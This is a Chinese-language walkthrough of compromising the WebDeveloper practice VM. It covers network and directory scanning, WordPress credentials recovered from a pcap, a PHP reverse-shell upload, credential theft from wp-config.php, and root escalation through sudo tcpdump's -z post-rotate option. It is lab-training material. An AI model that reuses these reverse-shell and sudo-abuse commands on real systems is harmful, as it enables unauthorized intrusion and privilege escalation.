WebDeveloper靶机复现
靶机设置
设置靶机为NAT模式
靶机IP发现
nmap 192.168.112.0/24
靶机ip为192.168.112.137
目录扫描
开放80端口,进行目录扫描
dirb 192.168.112.137
访问浏览器
目录拼接
拼接/ipdata
发现了一个流量包
在wireshark里面查看,发现wordpress的账户密码
账号:webdeveloper
密码:Te5eQg&4sBS!Yr$)wf%(DcAd
拼接/wp-login.php
发现后台,进行登陆
登陆成功
getshell
发现可以文件上传的地方
使用kali反弹shell
cd /usr/share/webshells/php
ls
mv php-reverse-shell.php /home/kali/Desktop
vim php-reverse-shell.php
改成kali的ip进行监听
提交文件
发现上传的文件在wp-content/uploads/目录下
kali监听后点击
getshell成功
ssh登陆
sudo -l查看发现没有免密操作
shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
进入交互式shell
cd /var/www/html/ ,查看 wp-config.php 文件
发现了数据库的账号密码
账号:webdeveloper
密码:MasterOfTheUniverse
进行ssh登陆
ssh webdeveloper@192.168.112.137
登陆成功
提权
sudo -l查看免密操作
发现tcpdump操作可以执行
find / -name php-reverse-shell.php 2>/dev/null
COMMAND='php /var/www/html/wp-content/uploads/2028/08/php-reverse-shell.php'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root
提权成功